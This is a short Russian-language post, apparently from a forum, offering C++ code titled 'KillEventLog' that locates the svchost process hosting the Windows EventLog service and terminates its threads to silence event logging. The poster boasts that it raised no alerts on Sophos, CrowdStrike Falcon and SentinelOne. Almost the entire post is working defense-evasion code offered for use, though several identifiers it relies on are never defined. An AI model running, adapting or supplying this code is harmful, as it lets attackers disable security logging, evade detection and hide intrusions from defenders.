KillEventLog с BlackHat 2024
Тестил на софос, фалькон, сентинел без алертов.
Тестил на софос, фалькон, сентинел без алертов.
C++:
int KillEventLogThreads()
{
SC_HANDLE hSVCM = OpenSCManagerA(".", NULL, MAXIMUM_ALLOWED);
SC_HANDLE hEventLogService = OpenServiceA(hSVCM, "EventLog", MAXIMUM_ALLOWED);
SERVICE_STATUS_PROCESS svcStatus = {};
DWORD bytesNeeded = 0;
if (!QueryServiceStatusEx(hEventLogService, SC_STATUS_PROCESS_INFO, (LPBYTE)&svcStatus, sizeof(svcStatus), &bytesNeeded))
{
printf("[!] Unable to get PID of svchost.exe that hosts EventLog service (%u)\n", GetLastError());
return -1;
}
DWORD hEventLogServicePID = svcStatus.dwProcessId;
printf("\n[*] Targeting svchost.exe hosting eventlog service with PID: %d\n", (int)hEventLogServicePID);
using OpenProcessPrototype = HANDLE(WINAPI*)(DWORD, BOOL, DWORD);
OpenProcessPrototype OpenProcess = (OpenProcessPrototype)GetProcAddress(GetModuleHandleA(win32), sOpenP);
HANDLE hSVC = NULL;
hSVC = OpenProcess(PROCESS_VM_READ, FALSE, hEventLogServicePID);
if (hSVC == NULL)
{
printf("[!] Failed to get a handle to svchost.exe that hosts EventLog service (%u)\n", GetLastError());
return -1;
}
int killcount = 0;
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
THREAD_BASIC_INFORMATION threadBasicInfo;
BOOL bIsWoW64 = FALSE;
DWORD dwOffset = NULL;
PVOID subProcessTag = NULL;
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnap == INVALID_HANDLE_VALUE)
return -1;
te32.dwSize = sizeof(THREADENTRY32);
if (!Thread32First(hThreadSnap, &te32))
{
printf("Thread32First() and we died (%u)\n", GetLastError());
CloseHandle(hThreadSnap);
return -1;
}
do
{
if (te32.th32OwnerProcessID == hEventLogServicePID)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
if (hThread == NULL)
{
printf("[!] Failed to get a handle to one of EventLog service Threads (%u)\n", GetLastError());
return -1;
}
NTSTATUS status = pNtQueryInformationThread(hThread, (THREAD_INFORMATION_CLASS)0, &threadBasicInfo, sizeof(threadBasicInfo), NULL);
bIsWoW64 = IsWow64Process(hSVC, &bIsWoW64);
if (!bIsWoW64)
{
dwOffset = 0x1720;
}
else
{
dwOffset = 0xf60;
}
ReadProcessMemory(hSVC, ((PBYTE)threadBasicInfo.pTebBaseAddress + dwOffset), &subProcessTag, sizeof(subProcessTag), NULL);
SC_SERVICE_TAG_QUERY query = { 0 };
if (I_QueryTagInformation)
{
query.processId = (ULONG)hEventLogServicePID;
query.serviceTag = (ULONG)subProcessTag;
query.reserved = 0;
query.pBuffer = NULL;
I_QueryTagInformation(NULL, ServiceNameFromTagInformation, &query);
printf("[+] Thread FOUND: TID -> %d", te32.th32ThreadID);
if (TerminateThread(hThread, NULL))
{
printf("\tTerminated!\n");// , te32.th32ThreadID);
killcount++;
}
else
{
printf("\n[!] Failed to terminate EventLog thread (TID: %d) !\n", te32.th32ThreadID);
}
}
CloseHandle(hThread);
}
} while (Thread32Next(hThreadSnap, &te32));
CloseHandle(hThreadSnap);
CloseHandle(hSVC);
if (killcount == 0)
{
printf("[+] Event Logger is Either NOT running or Already Killed Previously!\n");
}
return 0;
}